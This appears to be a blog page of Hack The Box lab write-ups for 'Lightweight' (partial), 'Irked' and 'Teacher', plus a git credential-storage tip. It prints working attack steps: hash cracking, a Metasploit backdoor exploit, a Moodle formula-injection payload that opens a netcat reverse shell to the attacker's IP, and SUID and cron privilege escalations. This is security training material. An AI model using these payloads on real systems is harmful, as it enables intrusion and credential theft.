root@kali:~# echo -n N3q8ryccAAQmbxM1EA0AAAAAAAAjAAAAAA... | base64 -d > backup.7z

root@kali:~# ls -l | grep backup
-rw-r--r-- 1 root root 3411 May 17 21:32 backup.7z

root@kali:~# file backup.7z
backup.7z: 7-zip archive data, version 0.4

Since this backup file is password protected, we have to crack the password.

root@kali:~# 7z x backup.7z

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz (806EA),ASM,AES-NI)

Scanning the drive for archives:
1 file, 3411 bytes (4 KiB)

Extracting archive: backup.7z
--
Path = backup.7z
Type = 7z
Physical Size = 3411
Headers Size = 259
Method = LZMA2:12k 7zAES
Solid = +
Blocks = 1


Enter password (will not be echoed):

We can take dvantage of “7z2john.pl” installed on kali linux by default.

# install necessary module
root@kali:~# sudo apt-get install libcompress-raw-lzma-perl

# create hash for backup.7z
root@kali:/usr/share/john# ./7z2john.pl /root/backup.7z > /root/backup.7z.hash

# crack the hash with john the ripper
root@kali:~# john backup.7z.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip [SHA256 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 12 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
delete           (backup.7z)
1g 0:00:00:27 DONE (2019-05-17 21:52) 0.03595g/s 75.94p/s 75.94c/s 75.94C/s slimshady..morado
Use the "--show" option to display all of the cracked passwords reliably
Session completed

With this password “delete”, we can extract the data from backup.z7.
We can achieve some php files and we can find a credential in status.php.

root@kali:~# cat status.php 

~~~

<?php
$username = 'ldapuser1';
$password = 'f3ca9d298a553da117442deeb6fa932d';
$ldapconfig['host'] = 'lightweight.htb';
$ldapconfig['port'] = '389';
$ldapconfig['basedn'] = 'dc=lightweight,dc=htb';
//$ldapconfig['usersdn'] = 'cn=users';
$ds=ldap_connect($ldapconfig['host'], $ldapconfig['port']);
ldap_set_option($ds, LDAP_OPT_PROTOCOL_VERSION, 3);
ldap_set_option($ds, LDAP_OPT_REFERRALS, 0);
ldap_set_option($ds, LDAP_OPT_NETWORK_TIMEOUT, 10);

ldapuser1:f3ca9d298a553da117442deeb6fa932d

Switch to ldapuser1 with su command.

[10.10.14.4@lightweight ~]$ su ldapuser1
Password: 
[ldapuser1@lightweight 10.10.14.4]$

We have some executable in the home directory.

[ldapuser1@lightweight ~]$ ls -l
total 1484
-rw-rw-r--. 1 ldapuser1 ldapuser1   9714 Jun 15  2018 capture.pcap
-rw-rw-r--. 1 ldapuser1 ldapuser1    646 Jun 15  2018 ldapTLS.php
-rwxr-xr-x. 1 ldapuser1 ldapuser1 555296 Jun 13  2018 openssl
-rwxr-xr-x. 1 ldapuser1 ldapuser1 942304 Jun 13  2018 tcpdump
[ldapuser1@lightweight ~]$

The executable “openssl” has “effective” and “permitted”.

[ldapuser1@lightweight ~]$ getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/openssl =ep

By following command, we can achieve root.txt

[ldapuser1@lightweight ~]$ ./openssl base64 -in /root/root.txt | base64 -d
f1d4e309c5a6b3fffff74a8f4b2135fa

Git skip https auth

30 Apr 2019

Environment

OS: Kali linux 2019.1
Git: 2.20.1

Explanation

How to skip authiorization when we access remote repository via https
Example:

root@kali:~/1n4r1.github.io# git push origin git-skip-auth
Username for 'https://github.com': 1n4r1
Password for 'https://1n4r1@github.com':

Solution

We can use git-credential.
Since I’m using Kali, I can not use any authentication procedure of OS.
So I have to store my credential in local directory.

git config --global credential.helper store

We have to login with username/password one time after this command.
Then, the auth data will be stored here

root@kali:~# cat .git-credentials 
https://1n4r1:SuperStrongFakePassword!!@github.com
root@kali:~#

Now, we don’t have to put credentials any more.

Hackthebox Irked Writeup

27 Apr 2019

Explanation

Hackthebox is a website which has bunch of vulnerable machines in its own VPN. This is a write-up of machine “Irked” on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:~# nmap -p- 10.10.10.117 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-29 23:55 EET
Nmap scan report for 10.10.10.117
Host is up (0.037s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          38929/tcp  status
|_  100024  1          55964/udp  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
38929/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.62 seconds

Gobuster HTTP:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.117/

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.117/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Timeout      : 10s
=====================================================
2019/04/14 18:02:39 Starting gobuster
=====================================================
/manual (Status: 301)
/server-status (Status: 403)
=====================================================
2019/04/14 18:15:34 Finished
=====================================================

2. Getting User

We can find a vulnerability of “UnrealIRC” on Exploit database.

root@kali:~# searchsploit unrealirc
--------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                         |  Path
                                                                                       | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------- ----------------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                           | exploits/linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                                | exploits/windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                         | exploits/linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                                              | exploits/windows/dos/27407.pl
--------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

To execute the exploit, launch metasploit console.

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor 
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhost 10.10.10.117
rhost => 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP double handler on 10.10.14.23:4444 
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Uccg9OJybaPvTmSP;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Uccg9OJybaPvTmSP\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.23:4444 -> 10.10.10.117:51673) at 2019-04-14 17:49:40 +0300

id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)

In directory “/home/djmardov/Documents”, we can find user.txt and interesting file “.backup”.
Since we’re not use djmardov, we don’t have a permission to read user.txt

pwd
/home/djmardov/Documents
ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3 04:40 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt

Sounds the content of .backup is password for “steganography”

cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

On the top page of port 80, we can find a image file “irked.jpg” placeholder

We can use this website to decode the data of irked.jpg.
The data achieved is “Kab6h+m+bbp2J:HG”.

djmardov:Kab6h+m+bbp2J:HG

We can take advantage of the credential above for ssh connection.

root@kali:~# ssh djmardov@10.10.10.117
djmardov@10.10.10.117's password: 

~~~

Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$

unlike other boxes, user.txt in in a directory “Documents”.

djmardov@irked:~$ cat Documents/user.txt
4a66a78b12dc0e661a59d3f5c0267a8e

3. Getting Root

By enumeration, we can find some binary files which have SUID.

djmardov@irked:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

We can see an unordinary binary file “viewuser”.

djmardov@irked:~$ /usr/bin/viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-04-11 15:02 (:0)
djmardov pts/0        2019-04-14 11:05 (10.10.14.23)
sh: 1: /tmp/listusers: not found

Sounds like we need an input for “viewuser” and shell tries to execute it.
Then put a command to “/tmp/listusers”. We can confirm it is executed.

djmardov@irked:~$ echo /bin/bash > /tmp/listusers
djmardov@irked:~$ chmod 777 /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-04-23 17:05 (:0)
djmardov pts/0        2019-04-27 15:35 (10.10.14.23)
root@irked:~#

root.txt is in a directory “/root/”.

root@irked:~# cat /root/root.txt
8d8e9e8be64654b6dccc3bff4522daf3

Hackthebox Teacher Writeup

26 Apr 2019

Explanation

Hackthebox is a website which has bunch of vulnerable machines in its own VPN. This is a write-up of machine “Teacher” on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:# nmap -p- 10.10.10.153 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-15 23:12 EET
Nmap scan report for 10.10.10.153
Host is up (0.035s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.90 seconds

Gobuster HTTP:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.153
 
=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.153/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Timeout      : 10s
=====================================================
2019/02/16 09:41:51 Starting gobuster
=====================================================
/images (Status: 301)
/css (Status: 301)
/manual (Status: 301)
/js (Status: 301)
/javascript (Status: 301)
/fonts (Status: 301)
/phpmyadmin (Status: 403)
/moodle (Status: 301)
/server-status (Status: 403)
=====================================================
2019/02/16 09:56:06 Finished
=====================================================

Gobuster HTTP “/moodle”:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.153/moodle/

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.153/moodle/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Timeout      : 10s
=====================================================
2019/02/26 17:29:39 Starting gobuster
=====================================================
/search (Status: 301)
/blog (Status: 301)
/rss (Status: 301)
/login (Status: 301)
/media (Status: 301)
/files (Status: 301)
/user (Status: 301)
/calendar (Status: 301)
/admin (Status: 301)
/comment (Status: 301)
/report (Status: 301)
/local (Status: 301)
/pix (Status: 301)
/tag (Status: 301)
/group (Status: 301)
/my (Status: 301)
/install (Status: 301)
/lib (Status: 301)
/portfolio (Status: 301)
/cache (Status: 301)
/notes (Status: 301)
/message (Status: 301)
/lang (Status: 301)
/theme (Status: 301)
/blocks (Status: 301)
/question (Status: 301)
/backup (Status: 301)
/rating (Status: 301)
/filter (Status: 301)
/mod (Status: 301)
/auth (Status: 301)
/course (Status: 301)
/error (Status: 301)
/badges (Status: 301)
/repository (Status: 301)
/analytics (Status: 301)
/availability (Status: 301)
/webservice (Status: 301)
/plagiarism (Status: 301)
/competency (Status: 301)
=====================================================
2019/02/26 17:44:31 Finished
=====================================================

2. Getting User

As we can see, Moodule is running on this server. placeholder We can login the moodle as guest user but there is not any interesting information.
By enumerating some other pages, we can find that there is a strange image file on “/gallery.html” What we can find is that

There is a image tag its source file is exist but we can not see
This tag shows unknown message which says “That’s an F”

By executing curl command, we can figure out what is the content of 5.png

root@kali:~# curl http://10.10.10.153/images/5.png
Hi Servicedesk,

I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.

Could you guys figure out what the last charachter is, or just reset it?

Thanks,
Giovanni

According to this information, the username we can expect is “Giovanni”.
And its password consists of “Th4C00lTheacha” + one character.

We can take advantage of this information for login to moodle admin console.
At first, we have to create a possible password lists.

#! /usr/bin/python3

import string

PASS = "Th4C00lTheacha"

chars = ""
chars += string.ascii_letters
chars += string.digits
chars += string.punctuation

with open("./password.txt", "w") as f:
    txt = ""
    for c in chars:
        txt += PASS + c + '\n'
    f.write(txt)
    f.close()

By running a script above, we have possible passwords.
Then, try to execute dictionary attack.
We can use “wfuzz” for this purpose.

root@kali:~# wfuzz -w ./password.txt --hh 440 -t 20 -d "anchor=&username=giovanni&password=FUZZ" http://10.10.10.153/moodle/login/index.php

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.153/moodle/login/index.php
Total requests: 94

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000065:  C=303      6 L	      34 W	    454 Ch	  "Th4C00lTheacha#"

Total time: 11.37637
Processed Requests: 94
Filtered Requests: 93
Requests/sec.: 8.262736

This means we got this credential for moodle.

giovanni:Th4C00lTheacha#

placeholder

Then click on Algebra, setting button, and “More…” placeholder

Click “questions” and “create a new question”.
placeholder

Then, click “Caluculated” and “add”.
Put following values, save the change and click “next page”.

Question name: baa
Question test: foo
fomula: /*{a*/`$_GET[0]`;//{x}}
Grade: 100%

placeholder

By sending following request with web browser, we can achieve a reverse shell.

# current page url + &0=(date;nc -e /bin/bash 10.10.14.23 443) 
http://10.10.10.153/moodle/question/question.php?returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2&appendqnumstring&scrollpos=0&id=7&wizardnow=datasetitems&courseid=2&0=(date;nc%20-e%20/bin/bash%2010.10.14.23%20443)

root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.153] 48136
ls
addquestion.php
behaviour
category.php
category_class.php
category_form.php

~~~

Then, spawn a full tty shell.

root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.153] 48144
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@teacher:/var/www/html/moodle/question$

By enumeration on Teacher as www-data user, we can find a credential for mariadb in “/var/www/html/moodle/config.php”.

www-data@teacher:/var/www/html/moodle$ cat config.php
cat config.php
<?php  // Moodle configuration file

unset($CFG);
global $CFG;
$CFG = new stdClass();

$CFG->dbtype    = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost    = 'localhost';
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'root';
$CFG->dbpass    = 'Welkom1!';
$CFG->prefix    = 'mdl_';

~~~

In DB “moodle” of Mariadb, we can find some password hashes for each user.
One is outstanding.

MariaDB [moodle]> select username, password FROM mdl_user;
select username, password FROM mdl_user;
+-------------+--------------------------------------------------------------+
| username    | password                                                     |
+-------------+--------------------------------------------------------------+
| guest       | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
| admin       | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
| giovanni    | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
| Giovannibak | 7a860966115182402ed06375cf0a22af                             |
+-------------+--------------------------------------------------------------+
4 rows in set (0.00 sec)

By hash-identifier, we can figure out this is MD5.

root@kali:~# hash-identifier 
   #########################################################################
   #	 __  __ 		    __		 ______    _____	   #
   #	/\ \/\ \		   /\ \ 	/\__  _\  /\  _ `\	   #
   #	\ \ \_\ \     __      ____ \ \ \___	\/_/\ \/  \ \ \/\ \	   #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R #
   #							www.Blackploit.com #
   #						       Root@Blackploit.com #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: 7a860966115182402ed06375cf0a22af

Possible Hashs:
[+]  MD5
[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

~~~

Clack this hash with John the Ripper. The password is “expelled”.

We can use this credential “giovanni:expelled” for su command
As usuall, user.txt is in a home directory.

www-data@teacher:/var/www/html/moodle$ su giovanni
su giovanni
Password: expelled

giovanni@teacher:/var/www/html/moodle$ cd
cd
giovanni@teacher:~$ cat user.txt
cat user.txt
fa9ae187462530e841d9e61936648fa7

3. Getting Root

if we execute following command, we can assume automatic process is running and giving some modification for this directory by its date.

giovanni@teacher:~/work$ ls -la
ls -la
total 16
drwxr-xr-x 4 giovanni giovanni 4096 Apr 26 21:28 .
drwxr-x--- 4 giovanni giovanni 4096 Nov  4 19:47 ..
drwxrwxrwx 3 giovanni giovanni 4096 Apr 26 21:28 courses
drwxrwxrwx 3 giovanni giovanni 4096 Jun 27  2018 tmp

At the same time, we can find an interesting binary in “/usr/bin”.

giovanni@teacher:/usr/bin$ cat backup.sh
cat backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;

This script is doing

backup of directory ~/work/courses
extract these files in ~/work/tmp
giving permission 777 for extracted files.

Then, create a symbolic link to /root in ~/work/tmp/

giovanni@teacher:~/work/courses$ ln -s /root/ root
ln -s /root/ root

giovanni@teacher:~/work/tmp/courses$ ls -la
ls -la
total 12
drwxrwxrwx 3 root     root     4096 Apr 26 21:42 .
drwxrwxrwx 3 giovanni giovanni 4096 Apr 26 21:38 ..
drwxrwxrwx 2 root     root     4096 Jun 27  2018 algebra
lrwxrwxrwx 1 giovanni giovanni    6 Apr 26 21:28 root -> /root/

We have to wait for the cron job.
After that, we can achieve the root.txt from the symbolic link.

giovanni@teacher:~/work/tmp$ cat root/root.txt
cat root/root.txt
4f3a83b42ac7723a508b8ace7b8b1209

Older Newer